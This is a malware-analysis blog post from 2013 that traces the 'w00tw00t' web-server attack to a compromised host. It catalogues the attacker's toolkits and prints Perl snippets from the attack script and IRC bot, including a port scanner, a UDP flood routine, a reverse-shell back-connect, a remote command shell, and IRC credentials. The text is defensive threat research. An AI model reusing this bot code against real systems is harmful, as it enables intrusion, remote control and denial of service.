Monday, October 21, 2013

MMD-0008-2013 - What's Behind the #w00tw00t Attack

Background..

Not so long ago I received this attack came into our web server:

That was actually the first time of attack series we received as per listed here-->PASTEBIN
Had it enough, so I started to investigate this matter thoroughly. With the help from @malm0u53 I was lead to the source of attack, and start digging deeper over there to find stuffs that are malicious enough to make good person got shocked.

This report actually contains many way to mitigate the similar attack in the future, and also for understanding the source and nature of the current threat. For the Firewall/IPS/IDS filtration research, maybe this poor English writing can be used as reference. I will share the samples upon ready, contains very dangerous tool-kits & packages found.
Following is the report in details..

Tracking..

First I made classification of the IP addresses:

118.26.203.66
211.162.16.164
58.211.18.184
197.221.26.250
2.228.117.30
46.105.124.119 
212.227.251.6
Seeing the details of each IP..to prioritize the examination:
DATE                        | IP           | REVERSE                         | ASN  | NETWORK PREFIX  | AS CODE         | cn | ISP CODE            | ISP NAME
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Sun Oct 20 22:18:15 JST 2013|118.26.203.66 | -                               |23724 | 118.26.200.0/21 | CHINANET-IDC-BJ | CN | -                   | FOREST ETERNAL COMMUNICATION TECH. CO.LTD
Sun Oct 20 22:16:47 JST 2013|211.162.16.164| -                               |4837  | 211.162.16.0/20 | CHINA169        | CN | SZGWBN.NET          | BEIJING GUOXIN BILIN TELECOM TECHNOLOGY CO. LTD
Sun Oct 20 21:23:04 JST 2013|58.211.18.184 | -                               |23650 | 58.211.16.0/21  | CHINANET-JS-AS  | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
Sun Oct 20 21:23:03 JST 2013|197.221.26.250| -                               |37153 | 197.221.0.0/18  | HETZNE          | ZA | YOUR-SERVER.CO.ZA   | HETZNER (PTY) LTD
Sun Oct 20 21:23:06 JST 2013|2.228.117.30  |2-228-117-30.ip191.fastwebnet.it.|12874 | 2.224.0.0/13    | FASTWEB         | IT | FASTWEBNET.IT       | FUTURA ENTERPRISE
Sun Oct 20 21:23:08 JST 2013|46.105.124.119|poc2.polyspot.com.               |16276 | 46.105.0.0/16   | OVH             | FR | OVH.COM             | OVH SYSTEMS
Sun Oct 20 21:23:09 JST 2013|212.227.251.6 |s15378439.onlinehome-server.info.|8560  | 212.227.0.0/16  | ONEANDONE       | DE | 1AND1.CO.UK         | 1&1 INTERNET AG
Using lynx to check the validity of HTTP status in each server...
$ lynx -head -dump http://197.221.26.250
Looking up 197.221.26.250
Making HTTP connection to 197.221.26.250
Alert!: Unable to connect to remote host.
lynx: Can't access startfile http://197.221.26.250/

$ lynx -head -dump http://2.228.117.30
^C (Time out..)

$ lynx -head -dump http://211.162.16.164
HTTP/1.1 200 OK
Date: Sun, 20 Oct 2013 23:39:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 13 Oct 2013 21:40:12 GMT
ETag: "19958040-9d6-4e8a6323e4700"
Accept-Ranges: bytes
Content-Length: 2518
Connection: close
Content-Type: text/html; charset=UTF-8

$ lynx -head -dump http://58.211.18.184
HTTP/1.1 302 Moved Temporarily
Location: http://58.211.18.184/index.jsp
Content-Type: text/plain
Content-Length: 0
Date: Sun, 20 Oct 2013 12:29:23 GMT
Server: Apache Coyote/1.0
Connection: close

$ lynx -head -dump http://46.105.124.119
HTTP/1.1 404 Not Found
Date: Sun, 20 Oct 2013 12:31:04 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1

$ lynx -head -dump http://212.227.251.6
HTTP/1.1 200 OK
Date: Sun, 20 Oct 2013 12:20:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Leaving me the two suspected IP of:
212.227.251.6
211.162.16.164
The first IP: 212.227.251.6 was ending up into a cleaned up site..
GET / HTTP/1.1
Host: 212.227.251.6
User-Agent: BeastMalwareMustDieZilla
Referer: http://malwaremustdie.org
Connection: close

HTTP/1.1・200・OK(CR)(LF)
Date:・Sun,・20・Oct・2013・12:36:21・GMT(CR)(LF)
Server:・Apache/2.2.3・(Red・Hat)(CR)(LF)
X-Powered-By:・PHP/5.1.6(CR)(LF)
Content-Length:・312(CR)(LF)
Connection:・close(CR)(LF)
Content-Type:・text/html(CR)(LF)
(CR)(LF)

<!DOCTYPE・HTML・PUBLIC・"-//W3C//DTD・HTML・4.01//EN"・"http://www.w3.org/TR/html4/strict.dtd">(LF)
(LF)
<html>(LF)
<head>(LF)
<title>Pegasus・Host・|・Alojamiento・Web</title>(LF)
<link・rel="Stylesheet"・href="ph.css"・media="screen"・/>(LF)
</head>(LF)
(LF)
<body>(LF)
<img・src="./ph.jpg"・alt="Image・-・Pegasus・Host"・/><br・/>(LF)
p(E1)gina・temporal(LF)
(LF)
</body>(LF)
</html>(LF)
While 211.162.16.164 (thank's to MalMouse for noticing this!) lead us into the source of attack:

In the source:

Let's enlarge the point that described the source:
Well, this is what the source of the attack, a hacked site, I marked in green color the hack files..the site itself is full of the URL redirection that I can not comment as clean site itself, but I will focus to the w00tw00t attack component only:
Connected to 37.1.192.220.
220 FTP Server ready.
Name (37.1.192.220:rik): test
331 Password required for test
Password:
230 User test logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alF
229 Entering Extended Passive Mode (|||1460|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x  18 test     admin        4096 Sep  2 20:22  /
drwxr-x--x  10 test     admin        4096 Oct 13 18:02 ./
drwxr-x--x  10 test     admin        4096 Oct 13 18:02 ../
-rw-r--r--   1 test     admin           7 Oct 12 10:51 .codepage
-rw-r--r--   1 test     admin       37287 Oct 13 15:53 .dsf
drwx------   2 test     admin        4096 Aug 24 08:25 bin-tmp/
-rw-r--r--   1 test     admin    10368191 Sep 30 20:27 "blackcat.jpg"
-rw-r--r--   1 test     admin       19609 Oct  1 19:11 "bot.zip"
drwxr-x--x   2 test     admin        4096 Aug  7  2012 email/
drwxr-xr-x   2 test     admin        4096 Nov 27  2012 etc/
drwxr-xr-x   4 test     admin        4096 Nov 26  2012 home/
-rw-r--r--   1 test     admin        2043 Oct  8 08:58 "logclean"
-rw-r--r--   1 test     admin         650 Oct  8 08:58 "logclean.tgz"
drwxrws---   2 apache   admin      757760 Oct 20 14:16 mod-tmp/
-rw-r--r--   1 test     admin         416 Oct 12 09:17 "muhrc"
-rw-r--r--   1 test     admin       37281 Oct 13 16:34 "perl"
drwxr-x--x   2 test     admin        4096 Aug 18 11:18 php-bin/
-rw-r--r--   1 test     admin      480699 Oct 13 11:33 "pma.tgz"
-rw-r--r--   1 test     admin          76 Oct 11 10:16 "psybnc.conf"
-rw-r--r--   1 test     admin      130892 Oct 13 18:02 "screen.tar"
-rw-r--r--   1 test     admin       96937 Oct  8 08:56 "test.txt"
lrwxrwxrwx   1 apache   admin           7 Aug  7  2012 tmp -> mod-tmp/
-rw-r--r--   1 test     admin        3623 Sep 30 12:30 "unrealircd.conf"
-rw-r--r--   1 test     admin       84852 Oct 13 18:01 "vuln.txt"
-rw-r--r--   1 test     admin    37026699 Oct  6 13:12 "vulnmare"
drwxr-x--x  11 test     admin        4096 Sep 15 13:00 www/
-rw-r--r--   1 test     admin        5323 Oct 12 14:29 "x.pl"
-rw-r--r--   1 test     admin       11934 Oct  7 19:19 "xvuln.txt"
226 Transfer complete
And yes, I grab them all..

Threat Components..

The below files is the list and log used for the w00tw00t attack:

-rw-r--r--   1 test     admin       84852 Oct 13 18:01 "vuln.txt"
-rw-r--r--   1 test     admin    37026699 Oct  6 13:12 "vulnmare"
-rw-r--r--   1 test     admin       11934 Oct  7 19:19 "xvuln.txt"
And the below file is the w00tw00t attack script itself:
-rw-r--r--   1 test     admin        5323 Oct 12 14:29 "x.pl"
These files are the set of the hacking tools injected to this site:
-rw-r--r--   1 test     admin         650 Oct  8 08:58 "logclean.tgz"
-rw-r--r--   1 test     admin      480699 Oct 13 11:33 "pma.tgz"
-rw-r--r--   1 test     admin      130892 Oct 13 18:02 "screen.tar"
-rw-r--r--   1 test     admin       19609 Oct  1 19:11 "bot.zip"
-rw-r--r--   1 test     admin    10368191 Sep 30 20:27 "blackcat.jpg"
-rw-r--r--   1 test     admin       37281 Oct 13 16:34 "perl"

PS: the blackcat.jpg is actually a GZIP:
Ziped component #0
Compression Deflated
ExtraFlags (none)
Flags (none)
ModifyDate 2009:10:15 03:21:19-07:00
4 years, 5 days, 4 hours, 31 minutes, 25 seconds ago
OperatingSystem Unix
File Size 9.9 MB
File Type GZIP
MIME Type application/x-gzip

Peeling the Code: w00tw00t Attack Script - x.pl

Was written in pure Perl, the script is used to pwned the web server which having the vulnerable PHP, with injecting thus extracting all of the "package" files injected to the compromised server, and start to connect the server to the "master" via IRC channel. Below is the breakdown of the codes for the image: Using these Perl modules:

#!/usr/bin/perl

# MODULES

#use warnings;
use Parallel::ForkManager;
use IO::Socket;
use URI::_foreign;
use URI::_generic;
use URI::_query;
require URI::_foreign;
use URI;
use LWP;
use LWP::Simple;
use LWP::UserAgent;
use LWP::Protocol::http;
use URI::http;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
use HTTP::Headers;
use HTML::Parser;
use Parallel::ForkManager;
use IO::Socket;
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
use HTTP::Headers;
use Getopt::Long;
use Time::HiRes qw(gettimeofday);
use MIME::Base64;
How they define the User-Agent, Time Out, Payload & shell:
#use strict;
my $ua = LWP::UserAgent->new(agent => "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20);
my $hostfile="vuln.txt";
my $word=".dsf";
my $maximumprocess="50";
my $hiddenprocess='/usr/sbin/sshd                                                                                                              ';
my $eth="eth0";
my $spd='7';
my $scanclassb;
my $scanclassa;
my $explhost;
my $explpayhost;
my $explpayloadfile;
This is where the exploitation & its component was defined:
GetOptions(
 'exploit|x' => \&exploit,
        'h|hostfile=s'    => \$hostfile,
        'p|paths=s' => \$word,
        't|threads=s'      => \$maximumprocess,
        'help'        => \&usage,
        'hide=s'                => \$hiddenprocess,
        'b=s'           => \$scanclassb,
        'a=s'           => \$scanclassa,
        'i=s'           => \$eth,
        'spd=s'         => \$spd,
        'r'             => \&rev,
 'host=s' => \$explpayhost,
 'clean|sterge' => \&sterge,
The ATTACK logic of #w00tw00t used in this attack is very simple...

With some error trapping and.. they're not very friendly to their users...

Here's the main exploit function, noted: the extracting the PMA hacking tools to pwn the server:


Finally the scan wit activating PMA toolkit..and deletion of the toolkit extracted components..

Post #w00tw00t pwned..(1) The Evil Redirection Service

This is the main concept of the attack, explaining WHY this server has so many "weird" redirections.
This server itself was pawned and becoming host of evil redirection service, as per one of some dir below:

ftp> cd bin-tmp/
250 CWD command successful
ftp> ls -alF
229 Entering Extended Passive Mode (|||49723|)
150 Opening ASCII mode data connection for file list
drwx------   2 test     admin        4096 Aug 24 08:25 ./
drwxr-x--x  10 test     admin        4096 Oct 13 18:02 ../
-rwx------   1 test     admin        4564 Jun 15  2007 cgi.php*
-rw-------   1 test     admin         198 Aug 24 08:22 sess_02b1133c97f1cfe501c49939044db715
-rw-------   1 test     admin         233 Aug 24 08:23 sess_09e938787c74a1345b62c0cddb6e7ffb
-rw-------   1 test     admin           0 Aug 24 08:23 sess_0ea5482947611be5265c62949367ac1c
-rw-------   1 test     admin         203 Aug 24 08:24 sess_103115f99c01d5a2f99a000c17e413c2
-rw-------   1 test     admin           0 Aug 24 08:23 sess_145adf08b9432c2884dd4f174ebeb7d3
[...]
Inside the session or redirection:
"Disney??"
$ cat sess_02b1133c97f1cfe501c49939044db715
mobile_disable|i:0;mobile_enable|i:0;dle_user_id|i:0;dle_password|s:0:"";referrer|s:107:"/filmy/multfilmy/800-sbornik-multfilmov-uolta-disneya-zabavnye-melodii-silly-symphony-1931-1937-dvdrip.html";

"AntiVirus??"
$ cat sess_0b7d8l6ha6m4o0dedbkimdmhe4
mobile_disable|i:0;mobile_enable|i:0;referrer|s:73:"/bezopasnost/antivirus/1151-kiskav-2011-sbros-triala-trial-reset-new.html";
Format of the redirection itself:
mobile_disable|i:0;
mobile_enable|i:0;
dle_user_id|s:4:"3405";
dle_password|s:32:"ed7603cfd1904e27a05a53718a464eed";
member_lasttime|s:10:"1381781518";
referrer|s:42:"/index.php?subaction=userinfo&user=barmost";
A simple grep to extract all redirection:
$ cat *|grep -E -i -o "\/[a-z0-9]{1,}\/[a-z0-9]{1,}\/[a-z0-9\-]{1,}.html"
/filmy/multfilmy/800-sbornik-multfilmov-uolta-disneya-zabavnye-melodii-silly-symphony-1931-1937-dvdrip.html
/igry/avtosimulyatory/14638-18-stalnyh-koles-ekstremalnye-dalnoboyschiki-2-18-wheels-of-steel-extreme-trucker-2-2011-rus-repack-ot-fenixx.html
/filmy/dokumentalnye/29022-freddie-mercury-the-great-pretender-freddi-merkyuri-velikiy-pritvorschik-2012-hdtv.html
/soft/grafika/25607-domashnyaya-fotostudiya-521-portable-by-samdel.html
/soft/utility/1194-connectify-pro-32022201.html
/soft/grafika/1207-cover-expert-20527-repack-3d-modelirovanie.html
/music/pop/29049-dancing-planet-vol-3-2013.html
/music/pop/29050-zarubezhnyy-svezhachok-2-2013.html
/filmy/uzhasy/26232-tehasskaya-reznya-benzopiloy-3d-texas-chainsaw-3d-2013-bdrip-avc.html
/soft/grafika/14107-face-off-max-3456.html
/music/shanson/29051-va-bezdna-letnego-shansona-versiya-4-2013.html
/music/classic/29039-va-vivaldi-genii-klassicheskoy-muzyki-2012-alac.html
/music/rock/29023-deep-purple-wacken-2013-2013-hdtv.html
/music/rock/29038-ddt-rozhdennyy-v-sssr-2004-dvd5.html
/filmy/dokumentalnye/7509-russkie-sensacii-vip-s-bolshoy-dorogi-efir-24032012-satrip.html
/music/pop/29021-va-80s-dance-deluxe-collection-2013-mp3.html
If you se the inside of CGP.PHP file itself is a PHPSHEL v1.7:

Post #w00tw00t pwned..(2) The Network Attack Tool (Portscnner, DDoS, etc)

Not a surprise anymore to find an attack tool in the case like this, it seems like is the part of the package actually. Below is the snippet code used for the attack (the snipped codes was cut and modified, so it is "neutralized"). File:

-rw-r--r--   1 test     admin       37281 Oct 13 16:34 perl
(this is the shadow of the below file, self copied by the main script)
-rw-r--r--   1 test     admin       37287 Oct 13 15:53 .dsf
Below are the evil code snippets for the PoC purpose:

The Port Scanner:

# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");

     # Quick scan
           if ($funcarg =~ /^ps (.*)/) {
             my $hostip="$1";
        sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Portscanning\003\002: $1 \002\00312Ports:\003\002 default");
             my (@aberta, %porta_banner);
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
         sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
                }
             }
             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 ");
             } else {
                 sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[x]\0034 No open ports found on\002 $1");
[...]
The "Nmap"(?)
# NMAP, lol
           elsif ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/)
      {
              my $hostname="$1";
              my $portstart = "$2";
               my $portend = "$3";
               my (@abertas, %porta_banner);
          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312xMap Portscanning\003\002: $1 \002\00312Ports:\003\002 $2-$3");
               foreach my $porta ($portstart..$portend)
             {
               my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => $portime);
               if ($scansock) {
                 push (@abertas, $porta);
                 $scansock->close;
                 if ($xstats)       {
                   sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open"); }}}
             if (@abertas) {
          sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Scan Complate\003\002");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\00312No ports found..\002");  }}
[...]
UDP For Flood:
[...] elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
              return unless $pacotes;
              socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
              my $alvo=inet_aton("$1");
              my $porta = "$2";
              my $tempo = "$3";
              my $pacote;
              my $pacotese;
              my $fim = time + $tempo;
              my $pacota = 1;
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(Get BOMbs)\003 Attacking\002: $1 - \002Time\002: $tempo"."seconds");
              while (($pacota == "1") && ($pacotes == "1")) {
                $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
                $pacote=$rand x $rand x $rand;
                $porta = int(rand 65000) +1 if ($porta == "0");
                send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
              }
              if ($xstats)
              {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312(UDP Complete):\003\002 $1 - \002Send\002: $pacotese"."kb - \002Time\002: $tempo"."seconds");}}
[...]
Backdoor, the "BackConnect"
# Backconnect
            elsif ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
              my $host = "$1";
              my $porta = "$2";
              my $proto = getprotobyname('tcp');
              my $iaddr = inet_aton($host);
              my $paddr = sockaddr_in($porta, $iaddr);
              my $shell = "/bin/sh -i";
              if ($^O eq "MSWin32") {
                $shell = "cmd.exe";
              }
              socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
              connect(SOCKET, $paddr) or die "connect: $!";
         sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[x] ->\0034 Injection ...");
              open(STDIN, ">&SOCKET");
              open(STDOUT, ">&SOCKET");
              open(STDERR, ">&SOCKET");
              system("$shell");
         system("cd /tmp/.mrx");
              close(STDIN);
              close(STDOUT);
              close(STDERR);
[...]
Shell..
sub shell {
  return unless $shellaccess;
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "cd: $1".": No such file or directory");
    return;
  }
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c >= "$linas_max") {
               $c=0;
[...]

Preview Video for the etc Hack Toolkit packages used (is an evidence of crime)

I can not discuss the other tool kits found for I am running out of time to write..there are so many of them!
But those tools really explain us a lot of details on what MO if the hack action is, you will see many tool-set with the ELF binaries insides, some are Open Source software that being mis-used for this malicious purpose. To make a good overview of the other tools used, I tried to open the archive of those hack-tools package one by one and recorded it in a video for you to view safely:

Who is the attacker?

The attack itself is controlled by a bad actor hidden behind an IRC connectivity , below I disclose the IRC configuration used by this case's attacker, contains the source of the IRC's IP, User's ID, IRC channel, Nicknames/Handles used for conducting the attack, is a check-mate:

-rw-r--r--   1 test     admin         416 Oct 12 09:17 muhrc

$ cat muhrc
nickname = "TaLa";
altnickname = "TaLa";
username = "wait";
realname = "TaLa's juppah ;-)";
password = "make";
listenport = 123456;
awayreason = "so we begin ;)";
servers {
 "irc.undernet.org":6667
};
logging = false;
channels = "#hackinganonymous";
connectcmd = "PRIVMSG x@channels.undernet.org : login 37 ZPhxkxzT";
away = "so we begin ;)";
norestricted = true;
#bind = "91.191.173.194";
#bind = "91.191.173.195";

-rw-r--r--   1 test     admin       37281 Oct 13 16:34 perl

[...]

my @admchan=("#mire");

$servidor='91.191.173.194' unless $servidor;


my $xeqt = "!";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;

my @fakeps = ("/usr/local/apache/bin/httpd -DSSL",
   "/usr/sbin/httpd -k start -DSSL",
   "/usr/sbin/httpd",
   "gnome-pty-helper",
   "httpd");

my @nickname = ("TeaMrx","fattys","eliter","vxbot","smufen","dual","lee","carro","frida",
   "TeaMrx1","TeaMrx0","TeaMrx2","TeaMrx3","TeaMrx4","TeaMrx5","TeaMrx6","TeaMrx7",
   "aVe","kmod","kmod2","uselib","raptor","tmpSH","pwned","w00t","DualDuo","Intel",
   "AMDPwr","Geforce","Exploit","vx8m0d","indexs","index","index2","index3","index4",
   "xQt1","xQt2","xQt3","xQt4","xQt5","xQt6","xQt7","xQt8","xQt9","xQt10","TeaMrxz",
   "De","Der","Det","Var","Kam","Dea","Csa","Fbi","Dea","Narko","Gone","Feber","Tull",
   "Tundra","st0rms","fLash","TheLight","Nikko","Nikie","Nikkie","daniel","t0nyandr",
   "Europa","Fanta","Caroline","speedline","Perf0rm","indexs","dan","educat","catina",
   "bindex","hindex","n0rway","myphp","phpvuln","Alarma","GoScan","oslocity","spette",
        "Cascam","vSport","vSmotor","vSteam","vSturbo","Turbost","heeman","andy","loundry",
   "ranger","Carbon","TypeR","Nozz","phpforum","Nxgas","NinaGirl","Isit","lama","ouch",
   "vTeam","vSpot","vCrew","xeQta","Gourl","Vulnx","Hksurl","Greedy","Mrx","counyjail",
   "Spourl","Torshov","Oslos","com_xeqt","mowgli","Asus","com_mrx","MrxTeam","arrest",
   "vScrew","beran","stuing","ucutter","readnot","gethelp","curpos","cutext","Busted",
        "detda","kanjo","neinei","Carbon","irriter","masa","dev-null","korsett","PerlTeam",
        "jada","kanjeg","mutterz","dalenmin","heimdal","Gambler","Deanz","Phreak","Getno",
        "Susa","Pils","Pilz","Bilz","Clubz","Clubs","Clubbin","Fights","Kampen","telenor",
        "Karss","Gophy","reactor","fileporn","filemp3","filelist","free6","purextc","upc",
   "Grandis","Piccaso","Vanda","varburen","Tiesto","Jean","DjEan","MeNe","ThiS","nO",
        "drspeed","fuzzy","buzzz","GoScan","Vulned","Gourl","makeconf","sshdconf","ngtno",
   "m0rtem","cat0","Fuckyall","Fuckit","Aem","Greedy","Hkss","Sparco","MoMo","Carbon",
        "d3nyall","vipz","dualc0rz","twoc0re","gotit","h0lyshit","prtls","rapt0r","Getde",
   "Vulnx","d3nyurl","vUlnurl","v0dka","Torshov","turboo","Boost","fasty","fr","getfr",
   "datacore","dualcore","Daniel","spurv","byrds","jails","spoot","speels","ml","getd",
   "Antivi","nod32","Screwed","alias","mekkka","template","f0rm3","p0ker","Geton","NO",
   "Door","Borr","Jaarn","Sporet","Dopa","Hasjen","purxTc","Liquer","Justlink","Asust",
   "Duffin","Durrett","Dussault","Dwyer","Eardley","Ebeling","Eckel","Edley","Edner",
   "Edward","Eickenhorst","Eliasson","Erdos","Erez","Espinoza","Estes","Etter","Eina",
   "Elmendorf","Elmerick","Elvis","Encinas","Enyeart","Eppling","Erbach","Erdman","d0",
   "Everett","Fabbris","Fagan","Faioes","Altavista","Flamor","Faris","Farone","f00ln3t",
   "Farren","Fasso'","Fates","Feigenbaum","Fejzo","Feldman","Euripides","Enzoo","d00rk",
   "Wikii","Wifii","Jvc","s0nny","lekter","herrier","sp0ker","netply","netb0st","Liq",
        "comma","julie","sveina","andre","pulsedj","p0ker","j0ker","eFn3t","Liers","xTcno",
   "Suite","Incl","Page","Mappe","Oxyd","Infode","Senil","Powers","Langu","m0d","doch",
   "Snakes","Ridder","Viking","Vikings","Norman","Norway","German","Info","Biz","Edud",
   "Ninjas","Ilness","Teacer","Faceoff","devnull","MoMo","Spoon","Liquid","Goofy","Aj",
   "Google","Yahoo","Altavista","Lycos","Sesam","Solno","Googler","ScamNet","w0rmnet",
   "puman","Skeidar","Tinemelk","Freia","Tresis","Tbanen","Adenyed","Hulken","Pureice",
   "Sperre","Lister","Burbon","burb0ns","Toy0","Proxes","WrxSti","Evo6","Evo7","Evo8",
   "wss","bss","natron","kiwis","Reman","SevnUp","Perlpls","Spiid","Govbr","Govmil",
   "Wssss","Files","xFiles","Dataw0rm","n3tw0rm","Info","Biz","Orgy","foksy","Reven",
   "limbo","mambi","bambi","rummy","IluvPerl","PerlKing","Pokerking","Turboa","Gttt",
   "BugScam","BugTraq","Trackqs","Que","Adidas","Umbro","Sportas","Liquid","Forume",
   "Deka","Jbl","Adecco","M5R","Tuners","Techno","Sivilen","Baosh","Snuten","Purken",
   "aaudi","coupe","netliga","liganet","netbase","NetSnok","Snoknet","Snifnet","libz",
   "indexp","jooblaa","mamboo","Binl3n","Cplusplus","p3rls3x","illgoon","de","lime",
   "homes","newsr","sindex","findex","shome","php3","eedan","Evens","Everest","kkk2",
   "igal","c0lombia","freeme","dupen","d3nmark","s2ed3n","crypt0n","n0dam3n","itch",
   "Domino","Tarsan","julie","Anett","Stine","Laura","Croft","Craft","Mrex","jiggy",
   "Hemaan","c0nan","c0nmen","ImI","RdR","Ils","Ass","Dildo","Pula","Blow","Sn0rts",
   "Aloalo","Nasa","DeaGov","FbiGov","NsaGov","CiaGov","CsiEdu","Hav0rd","djPulse",
        "Oslos","Ils","cia","d3a","dea","nsa","nas","asa","kma","Scamurl","vito","xQt");

my @xident = ("noway","mirc","cmd","index","main","php","vuln","iiris","bx","sun","khan",
   "info","cpu","pet","pacs","dino","megov","onet","xrm","tisi","parm","cico","jun",
   "caos","fred","peace","dude","rox","rock","rokie","bayrn","gees","hval","wolf",
   "do","go","ln","st","file","page","pag","pg","lg","lang","lng","srcs","action",
   "sml","pod","nvidia","vidia","villa","kake","spat","solo","Cols","kols","kreft",
   "lam","fal","dett","drop","snop","true","fake","yes","sir","mae","nmf","vmax","as",
   "adio","audo","soren","tvtre","host","unitd","coda","cobra","mans","gmail","gtrs",
   "remax","rik","fatig","poor","girls","pow","wop","wok","son","kolsa","royk","asss",
   "los","las","angl","dream","fools","phol","phools","d0rk","spon","spalk","kalk",
   "email","smtp","pops","imapd","pag","lang","lg","nav","php","spyer","cyp","hardy",
        "email","null","mastr","drunk","full","beer","bayer","mage","neve","fist","haist",
        "dara","dora","boris","dev","cupra","isgal","Yuri","Geez","Frys","dos","to","emul",
        "pwned","kung","kim","lil","fatjo","fatman","fat","joe","does","quat","tres","eu",
   "shv5","lrk","lkm","lkmrk","trk5","xt","tqex","itt","full","half","power","sender",
   "does","tres","quat","fiat","spon","kvae","liim","papp","ddos","fart","noz","daim",
   "liga","tvone","shdw","etcpwd","initd","ftpd","wuspl","proftp","newsd","sockd","lue",
   "loma","Domma","hest","heist","tivoli","stud","dust","fust","Flue","nille","kenny",
   "koma","loc","inc","incl","src","fokus","ford","chevy","wrc","cpu","cool","srchers",
   "inc","incl","dir","file","sdir","mains","login","path","base","cmd","cats","farts",
   "fiat","uno","jern","kober","liq","torsk","fisk","laks","hone","hore","buk","noman",
   "lim","idem","prince","sveina","kine","kim","allan","hanne","terje","bukken","bruse",
   "nu","do","li","faen","tater","doc","loc","pof","ninja","per","pets","sings","doper",
   "liq","dop","heroin","dok","page","php3","pop","smtp","data","kilde","foss","lowrdr",
   "drvby","viper","snake","dragon","dup","vuln","cat","grep","loop","inetd","proftpd",
   "pasive","damp","wals","snoke","snik","poff","phil","pill","dra","drjo","djo","laby",
   "rune","alan","britt","brita","stue","stenen","andy","bass","phatt","lover","fresa",
   "jvc","jbl","cia","fed","sov","purk","snut","snif","deka","svovel","life","knife","so",
   "deka","bos","boss","fres","spett","dusj","kappe","norman","keb0rd","fab","dor","bits",
   "kniv","lisa","nina","ole","pat","mtv","charl","smokie","nabo","walk","brks","krad-3",
   "dame","lady","bola","biffen","kamm","drev","sprider","spider","iscrem","daddy","pie",
          "ono","tima","mytm","motor","vsmot","sport","fart","devs","var","tmp","spol","sture".
        "jule","tree","gate","net","rand","perl","line","xqt","mrx","org","asus","sped","yaco",
   "hash","hmm","ddos","pwr","nix","linux","bsd","ppal","aio","mars","bates","daim","da",
   "pico","nmap","juge","sone","log","goofy","kars","meter","daim","kul","foksy","hyena",
   "beta","pulse","driver","org","fos","kars","kma","fua","all","tea","foks","lady","fa",
   "testo","bola","bolen","card","cards","chip","chips","wv","audi","bmw","roys","bechs",
   "nokia","mrx","some","candy","goo","cool","scam","scan","google","lee","cam","li","dm",
   "loff","grov","abcd","pulse","grow","alrt","spyd","trojan","maxd","xeqtd","xQtd","nodz",
   "owner","crime","data","need","doper","hash","mysql","imapd","devil","shark","byn","ju");

my @xname = ("Googurl (C) 2006 xeQt","www.Google.com","* Im to lame to read Bitchx.doc *","BiatchX",
   "Tveita Gjengen","Bgjengen","Agjengen","locos","putas","spooon","Type-R Turbo","Civic R Turbo",
   "mIRC 6.1","* Im so lame i cant ready BitchX.doc *","Bill Gates","Cannon","Mtv","nos","nozzz",
   "Sport Crew","vTeam","Turbo","random","paypal","netscam","www.milw0rm.com","lee","av","freace",
   "trojan donkey","Monster Garage","Garage Inc.","Pimp Ma Shit","Pimp my ride","Freak out","Doch",
   "www.packetstormsecurity.org","www.linux.com","www.freebsd.org","Hello There","tyson","mekkkka",
   "Im just myself man","Can u get the clue?","Im not the only one","Fear the lions","mekka","nooo",
   "Dragons back","Turbo Quattro","Sport Quattro","aheh goofy","Just for phun","gBill","goa","Yesir",
   "Thats my mofo name","Snoooop Doggy Style...","Tricky Trickey","love, peace, and xeQt","rbot","ha",
   "Clap your hands","one two tree, bass","lions","Drugs, sex, and xtc","i hate that biatch","ali",
   "Go fuck yourself","whois meeee","Fatjoe Corp","Brooklyn Bounche","Dj Pulsedriver","lee","furu",
   "Random","You have no clue","This rocks","uranium","BinLaden","Ted Bundy","Charlie Cheeens","hans",
